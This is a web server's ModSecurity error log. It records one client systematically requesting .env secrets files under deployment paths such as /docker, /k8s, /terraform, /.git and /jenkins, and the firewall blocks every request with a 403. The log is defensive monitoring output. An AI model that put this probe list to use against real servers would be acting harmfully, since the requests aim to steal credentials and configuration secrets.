[Mon May 11 14:10:31.028350 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHHN-JEyNRN152ArORzwQAAAFI"]
[Mon May 11 14:10:31.317120 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHHN-JEyNRN152ArORzwgAAAFI"]
[Mon May 11 14:10:31.317531 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHHN-JEyNRN152ArORzwgAAAFI"]
[Mon May 11 14:10:31.317723 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHHN-JEyNRN152ArORzwgAAAFI"]
[Mon May 11 14:10:31.317957 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHHN-JEyNRN152ArORzwgAAAFI"]
[Mon May 11 14:10:31.596743 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHHN-JEyNRN152ArORzxAAAAFI"]
[Mon May 11 14:10:31.597126 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHHN-JEyNRN152ArORzxAAAAFI"]
[Mon May 11 14:10:31.597319 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHHN-JEyNRN152ArORzxAAAAFI"]
[Mon May 11 14:10:31.597557 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHHN-JEyNRN152ArORzxAAAAFI"]
[Mon May 11 14:10:31.875592 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHHN-JEyNRN152ArORzxQAAAFI"]
[Mon May 11 14:10:31.875961 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHHN-JEyNRN152ArORzxQAAAFI"]
[Mon May 11 14:10:31.876148 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHHN-JEyNRN152ArORzxQAAAFI"]
[Mon May 11 14:10:31.876396 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHHN-JEyNRN152ArORzxQAAAFI"]
[Mon May 11 14:10:32.127415 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHHOOJEyNRN152ArORzxgAAAFI"]
[Mon May 11 14:10:32.127789 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHHOOJEyNRN152ArORzxgAAAFI"]
[Mon May 11 14:10:32.127968 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHHOOJEyNRN152ArORzxgAAAFI"]
[Mon May 11 14:10:32.128211 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHHOOJEyNRN152ArORzxgAAAFI"]
[Mon May 11 14:10:32.392680 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHHOOJEyNRN152ArORzyAAAAFI"]
[Mon May 11 14:10:32.393047 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHHOOJEyNRN152ArORzyAAAAFI"]
[Mon May 11 14:10:32.393238 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHHOOJEyNRN152ArORzyAAAAFI"]
[Mon May 11 14:10:32.393467 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHHOOJEyNRN152ArORzyAAAAFI"]
[Mon May 11 14:10:32.666616 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHHOOJEyNRN152ArORzyQAAAFI"]
[Mon May 11 14:10:32.666975 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHHOOJEyNRN152ArORzyQAAAFI"]
[Mon May 11 14:10:32.667182 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHHOOJEyNRN152ArORzyQAAAFI"]
[Mon May 11 14:10:32.667424 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHHOOJEyNRN152ArORzyQAAAFI"]
[Mon May 11 14:10:32.989677 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHHOOJEyNRN152ArORzygAAAFI"]
[Mon May 11 14:10:32.990026 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHHOOJEyNRN152ArORzygAAAFI"]
[Mon May 11 14:10:32.990209 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHHOOJEyNRN152ArORzygAAAFI"]
[Mon May 11 14:10:32.990441 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHHOOJEyNRN152ArORzygAAAFI"]
[Mon May 11 14:10:33.245007 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHHOeJEyNRN152ArORzywAAAFI"]
[Mon May 11 14:10:33.245389 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHHOeJEyNRN152ArORzywAAAFI"]
[Mon May 11 14:10:33.245555 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHHOeJEyNRN152ArORzywAAAFI"]
[Mon May 11 14:10:33.245768 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHHOeJEyNRN152ArORzywAAAFI"]
[Mon May 11 14:10:33.529682 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHHOeJEyNRN152ArORzzAAAAFI"]
[Mon May 11 14:10:33.530068 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHHOeJEyNRN152ArORzzAAAAFI"]
[Mon May 11 14:10:33.530264 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHHOeJEyNRN152ArORzzAAAAFI"]
